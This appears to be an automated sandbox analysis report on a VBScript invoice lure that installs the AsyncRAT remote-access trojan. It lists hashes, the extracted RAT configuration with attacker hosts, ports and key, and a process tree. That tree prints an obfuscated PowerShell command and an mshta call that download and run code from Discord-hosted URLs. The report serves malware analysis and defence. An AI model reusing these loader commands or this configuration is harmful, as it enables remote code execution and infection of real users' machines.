Analysis
-
max time kernel
119s -
max time network
151s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
18-04-2021 13:31
Static task
static1
Behavioral task
behavioral1
Sample
invoice-order-21412-paypal.xlxs.vbs
Resource
win7v20210410
General
-
Target
invoice-order-21412-paypal.xlxs.vbs
-
Size
162B
-
MD5
af9312989a85c937bf50226288f659ab
-
SHA1
ecb5925f60c91a7926579f086642c3f193fa1e64
-
SHA256
fda270ad50aed906730605ca93ecaa3e24792dd070bb443f94d2d6c23124ad61
-
SHA512
113a7dace186edcec5862f4d5fa75cab31ff096c51fac88549e42656eaba60a09660a2115579fc7aab8142b6c6bb65b0342486a522e161f598a103b2167d3413
Malware Config
Extracted
https://cdn.discordapp.com/attachments/833265385779494912/833265488183820359/Kaspersky.txt
Extracted
asyncrat
0.5.7B
:6606
:7707
:8808
usa-man.accesscam.org:6606
usa-man.accesscam.org:7707
usa-man.accesscam.org:8808
xaft.camdvr.org:6606
xaft.camdvr.org:7707
xaft.camdvr.org:8808
goodpc.theworkpc.com:6606
goodpc.theworkpc.com:7707
goodpc.theworkpc.com:8808
AsyncMutex_6SI8OkPnk
-
aes_key
9sb1l01wZwOFyWz3WpY3G9vMmrO3T3j5
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
,usa-man.accesscam.org,xaft.camdvr.org,goodpc.theworkpc.com
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6606,7707,8808
-
version
0.5.7B
Signatures
-
Async RAT payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/1420-73-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral1/memory/1420-74-0x000000000040C79E-mapping.dmp asyncrat behavioral1/memory/1420-76-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral1/memory/1420-81-0x0000000004130000-0x000000000414D000-memory.dmp asyncrat behavioral1/memory/1420-82-0x0000000005400000-0x0000000005440000-memory.dmp asyncrat -
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exepowershell.exeflow pid process 7 1176 mshta.exe 9 1176 mshta.exe 10 632 powershell.exe 12 632 powershell.exe 14 632 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 632 set thread context of 1420 632 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exeaspnet_compiler.exepid process 632 powershell.exe 632 powershell.exe 1420 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 632 powershell.exe Token: SeDebugPrivilege 1420 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
WScript.exemshta.exepowershell.exedescription pid process target process PID 1104 wrote to memory of 1176 1104 WScript.exe mshta.exe PID 1104 wrote to memory of 1176 1104 WScript.exe mshta.exe PID 1104 wrote to memory of 1176 1104 WScript.exe mshta.exe PID 1176 wrote to memory of 632 1176 mshta.exe powershell.exe PID 1176 wrote to memory of 632 1176 mshta.exe powershell.exe PID 1176 wrote to memory of 632 1176 mshta.exe powershell.exe PID 632 wrote to memory of 1420 632 powershell.exe aspnet_compiler.exe PID 632 wrote to memory of 1420 632 powershell.exe aspnet_compiler.exe PID 632 wrote to memory of 1420 632 powershell.exe aspnet_compiler.exe PID 632 wrote to memory of 1420 632 powershell.exe aspnet_compiler.exe PID 632 wrote to memory of 1420 632 powershell.exe aspnet_compiler.exe PID 632 wrote to memory of 1420 632 powershell.exe aspnet_compiler.exe PID 632 wrote to memory of 1420 632 powershell.exe aspnet_compiler.exe PID 632 wrote to memory of 1420 632 powershell.exe aspnet_compiler.exe PID 632 wrote to memory of 1420 632 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\invoice-order-21412-paypal.xlxs.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://cdn.discordapp.com/attachments/833265385779494912/833265576608530492/Encoding.txt2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://cdn.discordapp.com/attachments/833265385779494912/833265488183820359/Kaspersky.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
f0e4d34ed76525d8f9e4d7330493870d
SHA1e269bbae066db1e3d4d168ef7b39406fe84c2ae1
SHA2566bcd573ce6d631dc7f8444d9a7d395a8e7f9fd74ecaafa40867d31a91ffb146c
SHA512d1e55d8ac5ee0fb9340ec80df996ae4069803f87c65c5fb82e54dff293983d0b129b3e40f78e3bfd12bc5a07f9cf9771abe8748cb1064f6b362ea192108fdc18
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
6e30e0bef3ff5acf5c4b5429314584bf
SHA1c2641c710c9f6190786ed73f82b7b5969258e31f
SHA2565895df6209b2df04b8ade3c38a7556923614ac2ead4980328263820fdca8edcf
SHA512cf08a60bda5f6b2301c412716dac6b75bc681f52b1cb5d65b65cfb8a978cab3ae652a5ff993cb8ffa5047fd94547904b61d5709cfd503f4e5c438964bb8fb660
-
memory/632-70-0x000000001B600000-0x000000001B601000-memory.dmpFilesize
4KB
-
memory/632-61-0x0000000000000000-mapping.dmp
-
memory/632-64-0x000000001AC50000-0x000000001AC51000-memory.dmpFilesize
4KB
-
memory/632-65-0x00000000023D0000-0x00000000023D1000-memory.dmpFilesize
4KB
-
memory/632-66-0x0000000002330000-0x0000000002331000-memory.dmpFilesize
4KB
-
memory/632-67-0x000000001ABD0000-0x000000001ABD2000-memory.dmpFilesize
8KB
-
memory/632-68-0x000000001ABD4000-0x000000001ABD6000-memory.dmpFilesize
8KB
-
memory/632-69-0x000000001C4F0000-0x000000001C4F1000-memory.dmpFilesize
4KB
-
memory/632-75-0x0000000002670000-0x0000000002671000-memory.dmpFilesize
4KB
-
memory/632-63-0x0000000002260000-0x0000000002261000-memory.dmpFilesize
4KB
-
memory/632-72-0x0000000002560000-0x000000000257F000-memory.dmpFilesize
124KB
-
memory/1104-59-0x000007FEFC4D1000-0x000007FEFC4D3000-memory.dmpFilesize
8KB
-
memory/1176-60-0x0000000000000000-mapping.dmp
-
memory/1420-73-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/1420-74-0x000000000040C79E-mapping.dmp
-
memory/1420-76-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/1420-78-0x0000000076E11000-0x0000000076E13000-memory.dmpFilesize
8KB
-
memory/1420-79-0x0000000004C00000-0x0000000004C01000-memory.dmpFilesize
4KB
-
memory/1420-81-0x0000000004130000-0x000000000414D000-memory.dmpFilesize
116KB
-
memory/1420-82-0x0000000005400000-0x0000000005440000-memory.dmpFilesize
256KB